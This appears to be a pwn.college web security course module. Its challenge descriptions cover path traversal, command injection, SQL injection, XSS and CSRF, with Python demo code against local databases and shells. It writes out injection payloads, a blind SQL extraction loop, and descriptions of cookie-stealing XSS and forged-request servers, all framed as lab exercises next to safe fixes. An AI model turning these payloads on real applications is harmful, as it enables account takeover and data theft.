Web Security


Intro to Cybersecurity

You have learned Linux and HTTP. Now, let's put these together!

Web content is served up via the internet by web servers, and like everything else, these web servers, and the pages that they serve up, contain vulnerabilities! In this module, you will wrap yourself in the mysteries of the web, exploring various types of vulnerabilities that can occur. As you work through this module, keep in mind that these aren't theoretical curiosities: these are common, critical vulnerabilities that occur all the time in the modern web and can lead to massive data breaches, account takeover, and more.

Now, dive in, and hack!



Challenges

This level will explore the intersection of Linux path resolution, when done naively, and unexpected web requests from an attacker. We've implemented a simple web server for you --- it will serve up files from /challenge/files over HTTP. Can you trick it into giving you the flag?

The webserver program is /challenge/server. You can run it just like any other challenge, then talk to it over HTTP (using a different terminal or a web browser). We recommend reading through its code to understand what it is doing and to find the weakness!


HINT: If you're wondering why your solution isn't working, make sure what you're trying to query is what is actually being received by the server! curl -v [url] can show you the exact bytes that curl is sending over.
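
To make the idea concrete, here is a minimal sketch of naive path resolution, assuming a server that simply joins the requested name onto /challenge/files. The function names are hypothetical and the real /challenge/server may work differently; posixpath is used so that the result is the same on any platform.

```python
import posixpath

BASE_DIR = "/challenge/files"  # directory the server intends to expose

def naive_resolve(requested):
    """Join the requested name onto BASE_DIR with no validation (hypothetical)."""
    return posixpath.normpath(posixpath.join(BASE_DIR, requested))

def stays_inside_base(requested):
    """The check a naive server forgets: is the result still under BASE_DIR?"""
    resolved = naive_resolve(requested)
    return posixpath.commonpath([BASE_DIR, resolved]) == BASE_DIR

print(naive_resolve("index.html"))      # /challenge/files/index.html
print(naive_resolve("../../flag"))      # /flag
print(stays_inside_base("../../flag"))  # False
```

Note that normpath only works on the path string; a real containment check would also need to account for symbolic links.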

The previous level's path traversal happened because of a disconnect between:

  1. The developer's awareness of the true range of potential input that an attacker might send to their application (e.g., the concept of an attacker sending characters that have special meaning in paths).
  2. A gap between the developer's intent (the implementation makes it clear that we only expect files under the /challenge/files directory to be served to the user) and the reality of the filesystem (where paths can go "back" up a directory level).

This level tries to stop you from traversing the path, but does it in a way that clearly demonstrates a further lack of the developer's understanding of how tricky paths can truly be. Can you still traverse it?
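
As an illustration of how such a defense can fall short, here is a sketch that assumes a hypothetical filter which trims dots and slashes from both ends of the requested path. This is an assumption for demonstration only; read the level's code to see what it actually does.

```python
import posixpath

BASE_DIR = "/challenge/files"

def filtered_resolve(requested):
    """Hypothetical filter: strip '.' and '/' from the ends, then join."""
    cleaned = requested.strip("/.")  # only touches leading/trailing characters
    return posixpath.normpath(posixpath.join(BASE_DIR, cleaned))

print(filtered_resolve("../../flag"))       # /challenge/files/flag
print(filtered_resolve("x/../../../flag"))  # /flag
```

The filter removes the obvious leading `../`, but anything in the middle of the path is left untouched.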

Now, imagine getting more crazy than these security issues between the web server and the file system. What about interactions between the web server and the whole Linux shell?

Depressingly often, developers rely on the command line shell to help with complex operations. In these cases, a web server will execute a Linux command and use the command's results in its operation (a frequent use case, for example, is the ImageMagick suite of commands that facilitate image processing). Different languages have different ways to do this (the simplest way in Python is os.system, but we will mostly be interacting with the more advanced subprocess.check_output), but almost all suffer from the risk of command injection.

In path traversal, the attacker sent an unexpected character (.) that caused the filesystem to do something unexpected to the developer (look in the parent directory). The shell, similarly, is chock full of special characters that cause effects unintended by the developer, and the gap between what the developer intended and the reality of what the shell (or, in previous challenges, the file system) does holds all sorts of security issues.

For example, consider the following Python snippet that runs a shell command:

os.system(f"echo Hello {word}")

The developer clearly intends the user to send something like Hackers, and the result to be something like the command echo Hello Hackers. But the hacker might send anything the code doesn't explicitly block. Recall what you learned in the Chaining module of the Linux Luminarium: what if the hacker sends something containing a ;?
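
The following sketch shows the effect of a ; in the input, assuming a POSIX shell with echo available. It uses subprocess.run with shell=True, which hands the whole string to the shell much as os.system does; the function names are hypothetical. The second function passes an argument list instead, so no shell parses the input.

```python
import subprocess

def greet_unsafe(word):
    """Build one shell string, as os.system(f"echo Hello {word}") would."""
    command = f"echo Hello {word}"
    # shell=True hands the whole string to the shell for parsing.
    result = subprocess.run(command, shell=True, capture_output=True, text=True)
    return result.stdout

def greet_argv(word):
    """Pass an argument list instead, so no shell ever parses the input."""
    result = subprocess.run(["echo", "Hello", word], capture_output=True, text=True)
    return result.stdout

print(greet_unsafe("Hackers"))                 # Hello Hackers
print(greet_unsafe("Hackers; echo INJECTED"))  # Hello Hackers, then INJECTED
print(greet_argv("Hackers; echo INJECTED"))    # Hello Hackers; echo INJECTED
```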

In this level, we will explore this exact concept. See if you can trick the level and leak the flag!

Many developers are aware of things like command injection, and try to prevent it. In this level, you may not use ;! Can you think of another way to command-inject? Recall what you learned in the Piping module of the Linux Luminarium...

An interesting thing about command injection is that you don't get to choose where in the command the injection occurs: the developer accidentally makes that choice for you when writing the program. Sometimes, these injections occur in uncomfortable places. Consider the following:

os.system(f"echo Hello '{word}'")

Here, the developer tried to convey to the shell that word should really be only one word. The shell, when given arguments in single quotes, treats otherwise-special characters like ;, $, and so on as just normal characters, until it hits the closing single quote (').

This level gives you this scenario. Can you bypass it?


HINT: Keep in mind that there will be a ' character right at the end of whatever you inject. In the shell, all quotes must be matched with a partner, or the command is invalid. Make sure to craft your injection so that the resulting command is valid!
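
The quote-matching requirement can be explored without running anything. The sketch below uses Python's shlex module as a rough stand-in for the shell's quote handling (it is an approximation, not the shell itself), and shows shlex.quote as one way a developer could quote the input properly. The function names are hypothetical.

```python
import shlex

def build_command(word):
    """The scenario from the text: input wrapped in single quotes."""
    return f"echo Hello '{word}'"

def quotes_balanced(command):
    """Approximate check: shlex raises ValueError on an unmatched quote."""
    try:
        shlex.split(command)
        return True
    except ValueError:
        return False

def build_quoted(word):
    """Let shlex.quote produce the quoting instead of adding quotes by hand."""
    return f"echo Hello {shlex.quote(word)}"

payload = "a'; echo INJECTED; echo 'b"
print(quotes_balanced(build_command("it's")))   # False: stray quote
print(build_command(payload))                   # echo Hello 'a'; echo INJECTED; echo 'b'
print(quotes_balanced(build_command(payload)))  # True: every quote has a partner
print(shlex.split(build_quoted(payload)))       # payload stays a single argument
```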

Calling shell commands to carry out work, or "shelling out" as it is often termed, is dangerous. Any part of a shell command is potentially injectable! In this level, we'll practice injecting into a slightly different part of a slightly different command.

Programs tend to shell out to do complex internal computation. This means that you might not always get sent the resulting output, and you will need to do your attack blind. Try it in this level: without the output of your injected command, get the flag!
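
One way to think about a blind injection is as a side channel: the injected command writes its result somewhere the attacker can read later. The sketch below assumes a POSIX shell and uses a temporary file as that side channel; the function names and the file location are hypothetical.

```python
import os
import shlex
import subprocess
import tempfile

def greet_blind(word):
    """Run the command but discard its output, as a blind endpoint would."""
    subprocess.run(f"echo Hello {word}", shell=True,
                   stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)

def demo():
    """Inject a command that redirects its own output into a readable file."""
    with tempfile.TemporaryDirectory() as tmp:
        side_channel = os.path.join(tmp, "out.txt")
        greet_blind(f"; echo LEAKED > {shlex.quote(side_channel)}")
        with open(side_channel) as handle:
            return handle.read()

print(demo())  # LEAKED
```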

Sometimes, developers try very hard to filter out potentially dangerous characters. The success in this challenge is almost perfect, but not quite... You'll be stumped for a while, but will laugh at its familiarity when you figure out the solution!

Of course, web applications can have security vulnerabilities that have nothing to do with the shell. A common type of vulnerability is an Authentication Bypass, where an attacker can bypass the typical authentication logic of an application and log in without knowing the necessary user credentials.

This level challenges you to explore one such scenario. This specific scenario arises, again, because of a gap between what the developer expects (that the URL parameters set by the application will only be set by the application itself) and the reality (that attackers can craft HTTP requests to their heart's content).

The goal here is not only to let you experience how such vulnerabilities might arise, but to familiarize you with databases: places where web applications store structured data. As you'll see in this level, data is stored into and read from these databases using a language called the Structured Query Language, or SQL (often pronounced like "sequel") for short. SQL will become incredibly relevant later, but for now, it is an incidental part of the challenge.

Anyways, go and bypass this authentication to log in as the admin user and get the flag!

Authentication bypasses are not always so trivial. Sometimes, the logic of the application might look correct, but again, the gap between what the developer expects to be true and what will actually be true rears its ugly head. Give this level a try, and remember: you control the requests, including all the HTTP headers sent!

Of course, these sorts of security gaps abound! For example, in this level, the specification of the logged-in user is actually secure. Instead of GET parameters or raw cookies, this level uses an encrypted session cookie that you will not be able to mess with. Thus, your task is to get the application to actually authenticate you as admin!

Luckily, as the name of the level suggests, this application is vulnerable to a SQL injection. A SQL injection, conceptually, is to SQL what a Command Injection is to the shell. In Command Injections, the application assembled a command string, and a gap between the developer's intent and the command shell's actual functionality enabled attackers to carry out actions unintended by the developer. A SQL injection is the same: the developer builds the application to make SQL queries for certain goals, but because of the way these queries are assembled by the application logic, the resulting actions of the SQL query, when executed by the database, can be disastrous from a security perspective.

Command injections don't have a clear solution: the shell is an ancient piece of technology, and the interfaces to the shell ossified decades ago and are very hard to change. SQL is somewhat more nimble, and most databases now provide interfaces that are very resistant to being SQL-injectable. In fact, the authentication bypass levels used such interfaces: they are very vulnerable, but not to SQL injection.

This level, on the other hand, is SQL-injectable, as it purposefully uses a slightly different way to make SQL queries. When you find the SQL query into which you can inject your input (hint: it is the only SQL query to substantially differ between this level and the previous level), look at what the query looks like right now, and what unintended conditions you might inject. The quintessential SQL injection adds a condition so that authentication can succeed without the attacker knowing the password. How can you accomplish this?
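
The difference between the two ways of making a query can be sketched with Python's sqlite3 module and an in-memory database. The table layout, credentials, and function names are assumptions for illustration and are not taken from the level. The first function builds the query by string formatting; the second uses ? placeholders, so the input is bound as data and never parsed as SQL.

```python
import sqlite3

def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 's3cret')")
    return db

def login_unsafe(db, username, password):
    """String formatting: the input becomes part of the SQL text."""
    query = (f"SELECT username FROM users WHERE username = '{username}' "
             f"AND password = '{password}'")
    return db.execute(query).fetchone()

def login_safe(db, username, password):
    """Placeholders: the input is bound as a value, not parsed as SQL."""
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return db.execute(query, (username, password)).fetchone()

db = make_db()
print(login_unsafe(db, "admin", "wrong"))        # None
print(login_unsafe(db, "admin", "' OR '1'='1"))  # ('admin',)
print(login_safe(db, "admin", "' OR '1'='1"))    # None
```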

The previous level's SQL injection was quite simple to pull off and still have a valid SQL query. This was, in part, because your injection happened at the very end of the query. In this level, however, your injection happens partway through, and there is (a bit) more of the SQL query afterwards. This complicates matters, because the query must remain valid despite your injection.
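
Here is a sketch of why the trailing part of the query matters, again with sqlite3 and a hypothetical users table. Injecting a lone quote into the first field leaves the rest of the query malformed, while ending the injection with a SQL comment (--) makes the database ignore what follows.

```python
import sqlite3

def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 's3cret')")
    return db

def login_unsafe(db, username, password):
    """The injectable username sits in the middle of the query."""
    query = (f"SELECT username FROM users WHERE username = '{username}' "
             f"AND password = '{password}'")
    return db.execute(query).fetchone()

def try_login(db, username, password):
    """Report malformed SQL instead of raising, to make the contrast visible."""
    try:
        return login_unsafe(db, username, password)
    except sqlite3.OperationalError as error:
        return f"invalid SQL: {error}"

db = make_db()
print(try_login(db, "admin'", "x"))     # invalid SQL: ...
print(try_login(db, "admin' --", "x"))  # ('admin',)
```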

If you recall, your command injection exploits typically caused additional commands to be executed. So far, your SQL injections have simply modified the conditions of existing SQL queries. However, similar to how the shell has ways to chain commands (e.g., ;, |, etc), some SQL queries can be chained as well!

An attacker's ability to chain SQL queries has extremely powerful potential. For example, it allows the attacker to query completely unintended tables or completely unintended fields in tables, and leads to the types of massive data disclosures that you read about on the news.

This level will require you to figure out how to chain SQL queries in order to leak data. Good luck!
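
One common way to combine queries is UNION, which appends the rows of a second SELECT to the first. The sketch below assumes a hypothetical search feature over a posts table alongside a users table; all table, column, and function names are made up for illustration. (Python's sqlite3 execute runs only one statement at a time, which is why the sketch uses UNION rather than a second statement after a ;.)

```python
import sqlite3

def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE posts (title TEXT)")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO posts VALUES ('welcome')")
    db.execute("INSERT INTO users VALUES ('admin', 's3cret')")
    return db

def search_unsafe(db, term):
    """Hypothetical search endpoint that formats the term into the query."""
    query = f"SELECT title FROM posts WHERE title LIKE '%{term}%'"
    return [row[0] for row in db.execute(query)]

db = make_db()
print(search_unsafe(db, "wel"))
# The injected UNION pulls a column from a table the search never meant to read.
print(search_unsafe(db, "' UNION SELECT password FROM users --"))
```

Both sides of a UNION must return the same number of columns, which is why the injected SELECT asks for exactly one.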

So far, the database structure has been known to you (e.g., the name of the users table), allowing you to knowingly craft your queries. As a developer, you might be tempted to prevent this by, say, randomizing your table names, so that an attacker can't specify them to query data that they are not supposed to. Unfortunately, this is not the slam dunk that you might think it is.

Databases are complex and much too clever for their own good. For example, almost all modern databases keep the database layout specification itself in a table. Attackers can query this table to get the table names, field names, and whatever other information they might need!

In this level, the developers have randomized the name of the (previously known as) users table. Find it, and find the flag!
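
In SQLite, the layout table is called sqlite_master. The sketch below assumes a hypothetical injectable search feature and a users table with a random suffix; it shows that the random name can be read back out of sqlite_master with the same UNION technique. All names other than sqlite_master are made up for illustration.

```python
import secrets
import sqlite3

def make_db():
    db = sqlite3.connect(":memory:")
    table = "users_" + secrets.token_hex(4)  # randomized table name
    db.execute(f"CREATE TABLE {table} (username TEXT, password TEXT)")
    db.execute("CREATE TABLE posts (title TEXT)")
    db.execute("INSERT INTO posts VALUES ('welcome')")
    return db, table

def search_unsafe(db, term):
    """Hypothetical search endpoint that formats the term into the query."""
    query = f"SELECT title FROM posts WHERE title LIKE '%{term}%'"
    return [row[0] for row in db.execute(query)]

db, secret_table = make_db()
leaked = search_unsafe(
    db, "' UNION SELECT name FROM sqlite_master WHERE type = 'table' --")
print(leaked)  # includes the randomized table name
```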

SQL injections happen in all sorts of places in an application and, like command injections, sometimes the result of the query is not sent back to you. With command injections, this case is easier: the commandline is so powerful that you can do a lot of things even blindly. With SQL injections, this is sometimes not the case. For example, unlike some other databases, the SQLite database used in this module cannot access the filesystem, execute commands, and so on.

So, if the application does not show you the data resulting from your SQL injection, how do you actually leak the data? Sometimes, even if the actual data is not shown, you can recover one bit! If the result of a query can make the application act two different ways (say, redirecting to an "Authentication Success" page versus an "Authentication Failure" page), then an attacker can carefully craft yes/no questions that they can get answers to.

This challenge gives you exactly this scenario. Can you leak the flag?
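
The yes/no idea can be sketched as a loop that asks, for each position, "is this character X?" and watches only whether the login succeeds. The example uses sqlite3 with a hypothetical users table and a made-up secret; in the real level, the oracle would be the application's HTTP response rather than a local function.

```python
import sqlite3
import string

ALPHABET = string.ascii_letters + string.digits + "{}_"  # assumed character set

def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'pwn{blind_sqli}')")
    return db

def login_ok(db, username, password):
    """The only thing the attacker observes: success or failure."""
    query = (f"SELECT 1 FROM users WHERE username = '{username}' "
             f"AND password = '{password}'")
    return db.execute(query).fetchone() is not None

def leak_password(db, username, max_len=64):
    """Recover the password one character at a time via yes/no probes."""
    recovered = ""
    for position in range(1, max_len + 1):
        for candidate in ALPHABET:
            probe = (f"{username}' AND substr(password, {position}, 1) "
                     f"= '{candidate}' --")
            if login_ok(db, probe, ""):
                recovered += candidate
                break
        else:
            break  # no candidate matched: end of value (or char outside ALPHABET)
    return recovered

print(leak_password(make_db(), "admin"))  # pwn{blind_sqli}
```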

Semantic gaps can occur (and lead to security issues) at the interface of any two technologies. So far, we have seen them happen between:

  • A web application and the file system, leading to path traversal.
  • A web application and the command line shell, leading to command injection.
  • A web application and the database, leading to SQL injection.

One part of the web application story that we have not yet looked at is the web browser. We will remedy that oversight with this challenge.

A modern web browser is an extraordinarily complex piece of software. It renders HTML, executes JavaScript, parses CSS, lets you access pwn.college, and much much more. Specifically important to our purposes is the HTML that you have seen being generated by every challenge in this module. When the web application generated paths, we ended up with path traversals. When the web application generated shell commands, we ended up with shell injections. When the web application generated SQL queries, we ended up with SQL injections. Do we really think HTML will fare any better? Of course not.

The class of vulnerabilities in which injections occur into client-side web data (such as HTML) is called Cross Site Scripting, or XSS for short (to avoid the name collision with Cascading Style Sheets). Unlike the previous injections, where the victim was the web server itself, the victims of XSS are other users of the web application. In a typical XSS exploit, an attacker will cause their own code to be injected into (typically) the HTML produced by a web application and viewed by a victim user. This will then allow the attacker to gain some control within the victim's browser, leading to a number of potential downstream shenanigans.

This challenge is a very first step in this direction. As before, you will have the /challenge/server web server. This challenge explores something called Stored XSS, which means that data that you store on the server (in this case, posts in a forum) will end up being shown to a victim user. Thus, we need a victim to view these posts! You will now have a /challenge/victim program that simulates a victim user visiting the web server.

Set up your attack and invoke /challenge/victim with the URL that will trigger the Stored XSS. In this level, all you have to do is inject a textbox. If our victim script sees three textboxes, we will give you the flag!
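
The root cause can be sketched on the server side: if post content is pasted into the page as-is, any HTML in it becomes part of the page. The rendering functions below are hypothetical stand-ins for the application's templating; html.escape from the standard library is one way to turn markup characters into harmless text.

```python
import html

def render_post_unsafe(content):
    """Paste user content straight into the page (hypothetical template)."""
    return f"<li>{content}</li>"

def render_post_safe(content):
    """Escape markup characters so the browser shows them as text."""
    return f"<li>{html.escape(content)}</li>"

post = '<input type="text">'
print(render_post_unsafe(post))  # <li><input type="text"></li>
print(render_post_safe(post))    # <li>&lt;input type=&quot;text&quot;&gt;</li>
```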

Okay, so injecting some HTML was pretty cool! You can imagine how this can be used to confuse victims, but it gets worse...

In the 1990s, the wise designers of the web invented JavaScript to make websites more interactive. JavaScript lives alongside your HTML, and makes things interesting. For example, this turns your browser into a clock:

<html>
  <body>
    <script>
      document.body.innerHTML = Date();
    </script>
  </body>
</html>

Basically, the HTML <script> tag tells the browser that what is inside that tag is JavaScript, and the browser executes it. I'm sure you can see where this is going...

In the previous level, you injected HTML. In this one, you must use the exact same Stored XSS vulnerability to execute some JavaScript in the victim's browser. Specifically, we want you to execute the JavaScript alert("PWNED") to pop up an alert that informs the victim that they've been pwned. The how of this level is the exact same as the previous one; only the what changes, and suddenly, you're cooking with gas!

In the previous examples, your injection content was first stored in the database (as posts), and was triggered when the web server retrieved it from the database and sent it to the victim's browser. Because the data has to be stored first and retrieved later, this is called a Stored XSS. However, the magic of HTTP GET requests and their URL parameters opens the door to another type of XSS: Reflected XSS.

Reflected XSS happens when a URL parameter is rendered into a generated HTML page in a way that, again, allows the attacker to insert HTML/JavaScript/etc. To carry out such an attack, an attacker typically needs to trick the victim into visiting a very specifically-crafted URL with the right URL parameters. This is unlike a Stored XSS, where an attacker might be able to simply make a post in a vulnerable forum and wait for victims to stumble onto it.

Anyways, this level is a Reflected XSS vulnerability. The /challenge/victim of this challenge takes a URL argument on the commandline, and it will visit that URL. Fool the /challenge/victim into making a JavaScript alert("PWNED"), and you'll get the flag!
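
Since the payload travels in a URL parameter, it has to be URL-encoded. Here is a small sketch using urllib.parse; the parameter name msg is an assumption (check the level's code for the real one), and the host is the one used elsewhere in this module.

```python
from urllib.parse import parse_qs, urlencode, urlsplit

PAYLOAD = '<script>alert("PWNED")</script>'

def build_reflected_url(base, param, payload):
    """Encode the payload into a query string appended to the base URL."""
    return f"{base}?{urlencode({param: payload})}"

url = build_reflected_url("http://challenge.localhost/", "msg", PAYLOAD)
print(url)
# Decoding the query string gives back the original payload.
print(parse_qs(urlsplit(url).query)["msg"][0])
```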

Like with SQL injection and command injection, sometimes your XSS occurs in the middle of some non-optimal context. In SQL, you have dealt with injecting into the middle of quotes. In XSS, you often inject into, for example, a textarea, as in this challenge. Normally, text in a textarea is just, well, text that'll show up in a textbox on the page. Can you bust out of this context and alert("PWNED")?

As before, the /challenge/victim of this challenge takes a URL argument on the commandline, and it will visit that URL.

Actual XSS exploits try to achieve something more than alert("PWNED"). A very common goal is to use the ability to execute JavaScript inside a victim's browser to initiate new HTTP requests masquerading as the victim. This can be done in a number of ways, including using JavaScript's fetch() function.

This challenge implements a more complex application, and you will need to retrieve the flag out of the admin user's unpublished draft post. After XSS-injecting the admin, you must use the injection to make an HTTP request (as the admin user) to enable you to read the flag. Good luck!

Once an attacker has code execution inside a victim's browser, they can do a lot of things. You've made a GET request in your previous attack, but typically, it's the POST requests that will change application state. This challenge ratchets up the realism: the /publish now needs a POST request. Luckily, fetch supports this!

Go figure out how to POST, and get the flag.

Depending on the attacker's goals, what they might actually be after is the victim's entire account. For example, attackers might use XSS to exfiltrate victim authentication data and then use this data to take over the victim's account.

Authentication data is often stored via browser cookies, such as what happened in Authentication Bypass 2 (but, typically, much more securely). If an attacker can leak these cookies, the result can be disastrous for the victim.

This level stores the authentication data for the logged in user in a cookie. You must use XSS to leak this cookie so that you can, in turn, use it in a request to impersonate the admin user. This exfiltration will happen over HTTP to a server that you run, and everything you need is available via JavaScript's fetch() and its ability to access (some) site cookies.


HINT: By "server that you run", we really mean that listening on a port with nc will be sufficient. Look at the -l and -v options to nc.
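
Whatever arrives at your listener will be a raw HTTP request, with the leaked data URL-encoded in the request line. The sketch below decodes such a line; the parameter name cookie and the sample value are made up for illustration.

```python
from urllib.parse import parse_qs, urlsplit

def extract_params(request_line):
    """Split 'METHOD target VERSION' and decode the target's query string."""
    _method, target, _version = request_line.split(" ", 2)
    return parse_qs(urlsplit(target).query)

# A request line like the one a listener might print (hypothetical values).
line = "GET /?cookie=auth%3Dadmin%7Csecret HTTP/1.1"
print(extract_params(line))  # {'cookie': ['auth=admin|secret']}
```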

You've used XSS to inject JavaScript to cause the victim to make HTTP requests. But what if there is no XSS? Can you just "inject" the HTTP requests directly?

Shockingly, the answer is yes. The web was designed to enable interconnectivity across many different websites. Sites can embed images from other sites, link to other sites, and even redirect to other sites. All of this flexibility represents some serious security risks, and there is almost nothing preventing a malicious website from simply directly causing a victim visitor to make potentially sensitive requests, such as (in our case) a GET request to http://challenge.localhost/publish!

This style of forging requests across sites is called Cross Site Request Forgery, or CSRF for short.

Note that I said almost nothing prevents this. The Same-origin Policy was created in the 1990s, when the web was still young, to (try to) mitigate this problem. SOP prevents a site at one Origin (say, http://www.hacker.com or, in our case, http://hacker.localhost:1337) from interacting in certain security-critical ways with sites at other Origins (say, http://www.asu.edu or, in our case, http://challenge.localhost/). SOP prevents some common CSRF vectors (e.g., when using JavaScript to make requests across Origins, cookies will not be sent!), but there are plenty of SOP-avoiding ways to, e.g., make GET requests with cookies intact (such as full-on redirects).

In this level, pwnpost has fixed its XSS issues (at least for the admin user). You'll need to use CSRF to publish the flag post! The /challenge/victim of this level will log into pwnpost (http://challenge.localhost/) and will then visit an evil site that you can set up (http://hacker.localhost:1337/). hacker.localhost points to your local workspace, but you will need to set up a web server to serve an HTTP request on port 1337 yourself. Again, this can be done with nc or with a python server (check out http.server!). Because these sites will have different Origins, SOP protections will apply, so be careful about how you forge the request!
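
As a starting point for the "evil site", here is a minimal sketch built on http.server that answers every GET with a redirect. The target URL and port 1337 come from the text above; the class and function names are hypothetical, and this is one possible approach rather than the intended solution.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer

TARGET = "http://challenge.localhost/publish"  # request the victim should make

class RedirectHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # A full-page redirect: the browser itself navigates to TARGET.
        self.send_response(302)
        self.send_header("Location", TARGET)
        self.end_headers()

    def log_message(self, format, *args):
        pass  # keep the terminal quiet

def make_server(port=1337):
    """Create (but do not start) the server; the empty host binds all interfaces."""
    return HTTPServer(("", port), RedirectHandler)
```

Calling make_server().serve_forever() would start it listening on port 1337 until interrupted.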

Recall that requests that originate from JavaScript run into the Same-Origin Policy, which slightly complicated our CSRF in the previous level. You figured out how to make a GET request without JavaScript. Can you do the same for POST?

Recall that a typical POST request is a result of either a JavaScript-invoked request (no good for SOP) or an HTML form submission. You'll need to do the latter. Of course, the /challenge/victim won't click the Submit button for you --- you'll have to figure out how to do that yourself (HINT: JavaScript can click that button; the request will still count as originating from the form!).

Go POST-CSRF to the flag!

Let's start putting a few things together... A CSRF can lead to many things, including other injections! Use the CSRF in this level to trigger an XSS and invoke an alert("PWNED") somewhere in http://challenge.localhost!


HINT: You will likely want to use JavaScript on your http://hacker.localhost:1337 page to send a GET request with <script> tags in a URL parameter. Be careful: if you encode this JavaScript in your HTML, your <script> tag will have the word </script> in a string (the URL parameter). This string </script> will actually be parsed by your browser as the closing tag of your page's actual <script> tag, and all hell will break loose.

If you encounter this error, I recommend dynamically building that string (e.g., "</s"+"cript>") in the JavaScript that runs on http://hacker.localhost:1337.

Okay, now that you have the CSRF-to-XSS chain figured out, pull off a CSRF leading to an XSS leading to a cookie leak that'll allow you to log in and get the flag!


HINT: Your solution might have two levels of JavaScript: one that runs on your http://hacker.localhost:1337 page, and one that runs in the reflected XSS. We suggest testing the latter first, by manually triggering the page with that input and seeing the result. Furthermore, as this code might be complex, be VERY careful about URL encoding. For example, + will not be encoded to %2b by most URL encoders, but it is a special character in a URL and gets decoded to a space ( ). Needless to say, if you use + in your JavaScript, this can lead to complete havoc.
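
The + pitfall is easy to reproduce with urllib.parse. In the sketch below, unquote_plus stands in for the form-style decoding a server applies to query strings, and quote with safe="" is one encoder that does turn + into %2B. The JavaScript string is just sample input.

```python
from urllib.parse import quote, unquote_plus

js = '"</s"+"cript>"'  # sample JavaScript containing a +

# Sent as-is, the + is decoded to a space on the receiving side.
print(unquote_plus(js))       # "</s" "cript>"

# Fully percent-encoded, it survives the round trip.
encoded = quote(js, safe="")
print(encoded)                # %22%3C%2Fs%22%2B%22cript%3E%22
print(unquote_plus(encoded))  # "</s"+"cript>"
```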

This level closes the loophole that allowed you to steal cookies from JavaScript. Cookies have a special setting called httponly, and when this is set, the cookie is only accessible in HTTP headers, and not through JavaScript. This is a security measure, aimed to prevent exactly the type of cookie pilfering that you have been doing. Luckily, Flask's default session cookie is set to be httponly, so you cannot steal it from JavaScript.

So, now how would you get the flag with your CSRF-to-XSS shenanigans? Luckily, you don't need the cookie! Once you have JavaScript execution within the page, you can freely fetch() other pages without worrying about the Same Origin Policy, since you now live in the same Origin. Use this, read the page with the flag, and win!

